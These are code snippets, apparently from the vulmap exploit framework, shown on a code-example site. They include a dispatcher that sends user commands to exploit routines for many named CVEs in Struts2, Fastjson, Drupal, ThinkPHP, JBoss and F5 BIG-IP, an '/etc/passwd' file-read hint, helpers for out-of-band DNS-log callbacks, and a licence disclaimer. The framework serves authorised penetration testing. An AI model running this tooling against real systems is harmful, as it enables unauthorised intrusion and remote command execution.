            elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
                exp_redhat_jboss.cve_2015_7501_exp(cmd)
            elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
                exp_apache_unomi.cve_2020_13942_exp(cmd)

            elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
                print(up)
                exp_thinkphp.cve_2019_9082_exp(cmd)
            elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
                exp_thinkphp.cve_2018_20062_exp(cmd)
            elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
                exp_drupal.cve_2018_7600_exp(cmd)
            elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
                exp_drupal.cve_2018_7602_exp(cmd)
            elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
                exp_drupal.cve_2019_6340_exp(cmd)

            elif vul_num == "S2-005" or vul_num == "s2-005":
                exp_apache_struts2.s2_005_exp(cmd)
            elif vul_num == "S2-008" or vul_num == "s2-008":
                exp_apache_struts2.s2_008_exp(cmd)
            elif vul_num == "S2-009" or vul_num == "s2-009":
                exp_apache_struts2.s2_009_exp(cmd)
            elif vul_num == "S2-013" or vul_num == "s2-013":
                exp_apache_struts2.s2_013_exp(cmd)
            elif vul_num == "S2-015" or vul_num == "s2-015":
                exp_apache_struts2.s2_015_exp(cmd)
            elif vul_num == "S2-016" or vul_num == "s2-016":
                exp_apache_struts2.s2_016_exp(cmd)
            elif vul_num == "S2-029" or vul_num == "s2-029":
                exp_apache_struts2.s2_029_exp(cmd)
            elif vul_num == "S2-032" or vul_num == "s2-032":
                exp_apache_struts2.s2_032_exp(cmd)
            elif vul_num == "S2-045" or vul_num == "s2-045":
                exp_apache_struts2.s2_045_exp(cmd)
            elif vul_num == "S2-046" or vul_num == "s2-046":
                exp_apache_struts2.s2_046_exp(cmd)
            elif vul_num == "S2-048" or vul_num == "s2-048":
                exp_apache_struts2.s2_048_exp(cmd)
            elif vul_num == "S2-052" or vul_num == "s2-052":
                exp_apache_struts2.s2_052_exp(cmd)
            elif vul_num == "S2-057" or vul_num == "s2-057":
                exp_apache_struts2.s2_057_exp(cmd)
            elif vul_num == "S2-059" or vul_num == "s2-059":
                exp_apache_struts2.s2_059_exp(cmd)
            elif vul_num == "S2-061" or vul_num == "s2-061":
                exp_apache_struts2.s2_061_exp(cmd)
            elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
                exp_apache_struts2.s2_devMode_exp(cmd)

            elif vul_num == "1.2.24":
                print(rmi_ldap)
                exp_fastjson.fastjson_1224_exp(cmd)
            elif vul_num == "1.2.47":
                print(rmi_ldap)
                exp_fastjson.fastjson_1247_exp(cmd)
            elif vul_num == "1.2.62":
                print(rmi_ldap)
                exp_fastjson.fastjson_1262_exp(cmd)

            elif vul_num == "CVE-2021-25646":
                print(bash_2)
                exp_apache_druid.cve_2021_25646_exp(cmd)

            elif vul_num == "CVE-2021-22986":
                exp_big_ip.cve_2021_22986_exp(cmd)
            elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902":
                print(
                    now.timed(de=delay) + color.yel_info() +
                    color.yellow(" Examples: /etc/passwd"))
                exp_big_ip.cve_2020_5902_exp(cmd)
            elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295":
                print(
                    now.timed(de=delay) + color.yel_info() + color.yellow(
                        " java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"
                    ))
                exp_apache_ofbiz.cve_2021_26295_exp(cmd)
            else:
                pass
Exemplo n.º 22
 def connection_print(prt_name):
     """Print a timestamped warning that the check for *prt_name* could not connect."""
     wait = globals.get_value("DELAY")  # global DELAY setting, forwarded to the timestamp helper
     stamp = now.timed(de=wait)
     badge = color.red_warn()
     text = color.cyan(" " + prt_name + " check failed because unable to connect !!!")
     print(stamp + badge + text)
Exemplo n.º 23
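def dns_request():
    """Return a random sub-domain on the selected DNS-log platform.

    The platform is chosen by the global ``DNSLOG`` setting:

    * ``"auto"`` tries hyuga, then dnslog.cn, then ceye, records the first one
      that yields a usable host in ``AUTO_DNSLOG`` and returns that host;
      ``"no dnslog"`` is returned (after printing a warning) when none does.
    * a value containing ``hyuga``, ``dnslog`` or ``ceye`` uses that platform
      only and returns whatever its helper produced.
    * anything else returns ``"no dnslog"``.

    Returns:
        A host of the form ``<random_md5()>.<platform domain>``, or one of the
        sentinel strings (``"no dnslog"``, ``"error"``, ``"bug"``, ``"None"``)
        that the explicit-platform branches pass through unchanged.
    """
    timeout = globals.get_value("TIMEOUT")  # request timeout used for every platform call
    dnslog = globals.get_value("DNSLOG")  # platform selector

    # Values the helpers hand back instead of a host name. "error" and "bug"
    # are truthy strings, so the auto branch must compare against them
    # explicitly rather than rely on truthiness.
    failed = (None, "", "error", "bug")

    # Both platform APIs below are reached over plain http://, so verify=False
    # has no effect on them and the returned domain/token are not
    # authenticated in transit.

    def ceye_io():
        """Return a random host under the configured ceye domain, or None if it is still the placeholder."""
        ceye_host = globals.get_value("ceye_domain")
        if r"xxxxxx" not in ceye_host:
            return random_md5() + "." + ceye_host
        return None

    def dnslog_cn():
        """Return a random host under a dnslog.cn domain, fetching the domain once and caching it."""
        # NOTE(review): the Cookie below is a fixed session baked into the
        # source, so every copy of this code presents the same dnslog.cn
        # session; presumably anyone holding that cookie can read the lookups
        # recorded for it. Prefer a per-run session - confirm with the
        # platform's behaviour.
        headers_dnslog = {
            'User-Agent':
            'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
            'Host': 'www.dnslog.cn',
            'Cookie':
            'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
            'Accept': '*/*',
            'Referer': 'http://www.dnslog.cn/',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'close'
        }
        dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"
        d_p = globals.get_value("DNS_DNSLOG_HOST")
        try:
            if d_p is None:
                dns = requests.get(dnslog_api,
                                   headers=headers_dnslog,
                                   timeout=timeout,
                                   verify=False)
                # An empty body would otherwise be cached as the domain and
                # silently poison every later call.
                domain = dns.text.strip()
                if not domain:
                    return "error"
                globals.set_value("DNS_DNSLOG_HOST", domain)
                return random_md5() + "." + domain
            return random_md5() + "." + d_p
        except Exception:
            return "error"

    def hyuga_co():
        """Return a random host under the hyuga domain, registering a new identity when none is configured."""
        headers_hyuga = {
            'User-Agent':
            'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
            'Connection': 'close',
            'Accept': '*/*',
            'Accept-Language':
            'zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6'
        }
        hyuga_api = "http://api.hyuga.co/v1/users"
        hyuga_host = globals.get_value("hyuga_domain")
        hyuga_token = globals.get_value("hyuga_token")
        try:
            if r"xxxxxx" not in hyuga_host:
                return random_md5() + "." + hyuga_host
            # Domain is still the placeholder: a token without a domain is an
            # inconsistent configuration.
            if r"xxxxxx" not in hyuga_token:
                return "bug"
            # Neither domain nor token configured: request a fresh identity
            # and remember it for the rest of the run.
            dns = requests.post(hyuga_api,
                                headers=headers_hyuga,
                                timeout=timeout,
                                verify=False)
            data = json.loads(dns.text)["data"]
            hyuga_host = data["identity"]
            dns_host = random_md5() + "." + str(hyuga_host)
            hyuga_token = data["token"]
            globals.set_value("hyuga_token", hyuga_token)
            globals.set_value("hyuga_domain", hyuga_host)
            return dns_host
        except Exception:
            # Best effort: any network or parsing failure means "not available".
            return None

    if dnslog == "auto":
        # Take the first platform that returns a real host. The helpers'
        # failure sentinels are rejected here so that a dnslog.cn failure
        # falls through to ceye and, if nothing works, to the warning below.
        for platform, probe in (("hyuga", hyuga_co),
                                ("dnslog", dnslog_cn),
                                ("ceye", ceye_io)):
            dns_req = probe()
            if dns_req not in failed:
                globals.set_value("AUTO_DNSLOG", platform)
                return dns_req
        print(
            now.timed(de=0) + color.red_warn() + color.red(
                " The dnslog platform cannot be used, please check the current network"
            ))
        return "no dnslog"
    elif r"hyuga" in dnslog:
        dns_req = hyuga_co()
        return str(dns_req)
    elif r"dnslog" in dnslog:
        dns_req = dnslog_cn()
        return dns_req
    elif r"ceye" in dnslog:
        ceye_host = globals.get_value("ceye_domain")
        if r"xxxxxx" in ceye_host:
            print(
                now.timed(de=0) + color.red_warn() + color.red(
                    " Ceye.io domain and token are incorrectly configured"))
            exit(0)
        dns_req = ceye_io()
        return dns_req
    else:
        return "no dnslog"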
Exemplo n.º 24
    globals.set_value("TIMEOUT", args.TIMEOUT)  # 设置全局变量超时时间TOMEOUT
    globals.set_value("THREADNUM", args.thread_num)  # 设置全局变量THREADNUM传递线程数量

    # 替换自己的 ceye.io 的域名和 token
    globals.set_value("ceye_domain", "xxxxxxxxxx")
    globals.set_value("ceye_token", "xxxxxxxxxx")

    # 替换自己的 http://hyuga.co 的域名和 token
    # hyuga的域名和token可写可不写,如果不写则自动获得
    globals.set_value("hyuga_domain", "xxxxxxxxxx")
    globals.set_value("hyuga_token", "xxxxxxxxxx")

    # fofa 邮箱和 key,需要手动修改为自己的
    globals.set_value("fofa_email", "xxxxxxxxxx")
    globals.set_value("fofa_key", "xxxxxxxxxx")

    # shodan key
    globals.set_value("shodan_key", "xxxxxxxxxx")


if __name__ == "__main__":
    # Start-up order: disclaimer gate, option parsing, global settings,
    # version check, then the core option handler that starts the scan.
    try:
        vulmap_license()  # user agreement and disclaimer
        args = arg()  # parse the command-line options
        config()  # load the global settings
        version_check()  # check the vulmap version
        core.control_options(args)  # dispatch on the options and start scanning
    except KeyboardInterrupt:
        # Ctrl-C ends the run with a short notice and a zero exit status.
        print(now.timed(de=0) + color.red_warn() + color.red(" Stop scanning"))
        exit(0)
Exemplo n.º 25
def vulmap_license():
    """Show the disclaimer and require acceptance unless it was accepted before.

    A marker file ``module/licenses/licenses.txt`` next to the running script
    means the disclaimer has already been accepted, and nothing is printed.
    Otherwise the English and Chinese texts are printed and the user is asked
    to accept: ``yes``/``y`` passes the marker path and a millisecond
    timestamp to ``output_text`` (presumably creating the marker file); any
    other answer exits the program.
    """
    pwd_vulmap = os.path.split(os.path.realpath(sys.argv[0]))[0]
    licenses = pwd_vulmap + "/module/licenses/licenses.txt"
    if os.path.isfile(licenses):
        return

    # English preamble: the disclaimer overrides the original LICENSE.
    english_tail = color.white(
        " to the original agreement (https://github.com/zhzyker/vulmap/blob/main/LICENSE). In case of conflict with the original agreement, the "
        + color.yellow("disclaimer") + color.white(" shall prevail.\n"))
    print(
        color.white("Add the following " + color.yellow("disclaimer") +
                    english_tail))

    english_terms = (
        "Unauthorized commercial use of this tool is prohibited, and unauthorized commercial use after secondary development is prohibited\n\n"
        "This tool is only for legally authorized corporate security construction activities. When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization.\n\n"
        "If you have any illegal behavior in the process of using this tool, you need to bear the corresponding consequences yourself, and we will not bear any legal and joint liabilities.\n\n"
        "Before using this tool, please read carefully and fully understand the content of each clause. Restrictions, exemptions, or other clauses involving your major rights and interests may be bolded, underlined, etc. to remind you to pay attention. Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not use this tool. Your use behavior or your acceptance of this agreement in any other express or implied manner shall be deemed to have been read and agreed to be bound by this agreement.\n"
    )
    print(color.white(english_terms))

    separator = "------------------------------------------------------------------\n"
    print(color.white(separator))

    # Chinese preamble and terms, same content as the English text above.
    chinese_preamble = (
        "在原有协议(https://github.com/zhzyker/vulmap/blob/main/LICENSE)中追加以下"
        + color.yellow("免责声明。") + color.white("若与原有协议冲突均以") +
        color.yellow("免责声明") + color.white("为准。\n"))
    print(color.white(chinese_preamble))

    chinese_terms = (
        "本工具禁止进行未授权商业用途,禁止二次开发后进行未授权商业用途\n\n"
        "本工具仅面向合法授权的企业安全建设行为,在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。\n\n"
        "如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。\n\n"
        "在使用本工具前,请您务必审慎阅读、充分理解各条款内容,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。\n"
    )
    print(color.white(chinese_terms))

    # Only the prompt differs per platform: coloured on linux/other, plain on
    # windows. Any other os_check() value skips the prompt entirely.
    host_os = os_check()
    if host_os in ("linux", "other"):
        prompt = now.timed(de=0) + color.yellow(
            "[*] I accept the disclaimer (yes/no): ")
    elif host_os == "windows":
        prompt = now.no_color_timed(
            de=0) + "[*] I accept the disclaimer (yes/no): "
    else:
        return

    lic = input(prompt)
    if lic in ("yes", "y"):
        # Record acceptance with the current time in milliseconds.
        create_date = int(round(time.time() * 1000))
        output_text(licenses, create_date)
        return

    print(now.timed(de=0) + color.red_warn() + color.red(" Good Lucking"))
    exit(0)